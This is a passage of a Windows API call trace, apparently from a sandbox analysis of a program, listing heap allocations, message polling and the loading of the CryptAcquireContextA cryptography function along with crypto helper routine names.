hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.370] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.371] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0206.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0206.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0206.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0206.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0206.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0206.372] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0206.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0206.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0206.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0206.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0206.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0206.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0206.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69c28 [0206.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69c28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0206.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0206.373] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0206.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0206.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0206.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0206.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0206.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0206.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0206.373] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0206.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0206.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0206.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0206.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0206.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0206.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0206.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0206.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0206.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0206.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0206.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0206.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0206.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0206.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0206.377] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0206.377] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.377] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.377] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0206.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0206.377] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0206.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0206.378] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.378] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0206.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0206.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0206.378] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0206.378] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0206.378] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0206.378] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0206.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0206.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0206.379] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0206.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0206.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.380] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0206.380] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0206.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0206.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0206.380] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0206.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0206.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0206.381] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.381] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0206.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0206.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.381] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0206.381] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0206.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.381] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, 